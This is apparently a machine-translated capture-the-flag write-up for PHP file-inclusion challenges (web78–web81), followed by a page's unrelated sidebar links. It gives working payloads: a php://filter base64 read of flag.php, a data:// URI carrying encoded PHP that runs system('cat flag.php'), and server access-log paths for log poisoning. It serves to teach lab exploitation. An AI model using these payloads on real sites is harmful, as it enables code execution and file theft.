当前位置:网站首页>Showctf starter file contains series
Showctf starter file contains series
2022-06-21 08:03:00 【Cyclone 1+1】
- web78
Read source code :
assume , Is this ?
direct :http://url Address /?file=flag.php, But it won't come out , The page has nothing , Thinking that this is a PHP file , It may be resolved by the server when we include . So we have to keep it from parsing , Here's a way ,PHP In pseudo protocol :php://filter
direct :
http://url Address /?file=php://filter/read/convert.base64-encode/resource=flag.php
Succeed in getting flag.php File contents of , Online URL solution base64:
https://tool.oschina.net/encrypt?type=3
- web79
This question and also use PHP Pseudo protocol in :
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=<-----base64-encode/decode-----> <?php system(‘cat flag.php’);
- web80
This paper mainly studies nginx The server's log file contains , Common server log file locations :
nginx: /var/log/nginx/access.log
apache: /var/log/httpd/access_log
bp Intercept :

- web81
This question and 80 The questions are the same .
边栏推荐
- 虚拟机浏览器花屏空白问题
- (greedy) B. avoid local maximums
- Bean实例化的三种方法
- Vision_ Transformer code exercise
- [Redis]-[Redis底层数据结构]-字典
- Global and Chinese market for online automatic optical inspection 2022-2028: Research Report on technology, participants, trends, market size and share
- dried food! Neuron competitive initialization strategy based on information bottleneck theory
- Complex four operations (23 lines of concise code)
- 面试鸭 面试刷题 网站系统源码
- [Redis]-[Redis底层数据结构]-SDS
猜你喜欢

How to view the MySQL installation path

Weekly update | showmebug officially launched Tencent conference audio and video

Arduino about software uninstallation and library uninstallation

Actual use case of strategic routing in a school cloud computer project

2021-06-17 STM32F103 USART serial port code using firmware library

Le Code est correct, mais les données de la base de données ne sont pas affichées.

JVM memory model concepts

Scientific research information | national natural conclusion regulations: more than 50% of the fund balance or it will not be concluded

2021-07-28 STM32F103 I2C Hardware Transfer Include previous IO Clock EXIT USB use firmware library

Mongodb installation (Graphic tutorial)
随机推荐
1005 spell it right (20 points) (test point 3)
Rdkit | topological polarity surface area (TPSA)
Traversal of binary tree
Talk about MySQL's locking rule "hard hitting MySQL series 15"
How MySQL closes a transaction
[Blue Bridge Cup monolithic unit] serial port communication
Redis cache use case
[putty] a free SSH and telnet client
What are the differences between SQL and MySQL
Three declaration methods of structure type
Eureka的TimedSupervisorTask类(自动调节间隔的周期性任务)
2021-06-16 STM32F103 EXTI 中斷識別 使用固件庫
数字孪生实际应用案例-煤矿篇
How can we make millions a year now?
2021-06-18 STM32F103 DMA 与 DMA串口代码 使用固件库
A table to easily understand the prefix and suffix of increment and decrement operators
2021-06-16 STM32F103 exti interrupt identification using firmware library
antd table长表格如何出现滚动条
[UML modeling] (4) sequence diagram of UML modeling
Multiplication and addition of univariate polynomial (20 points)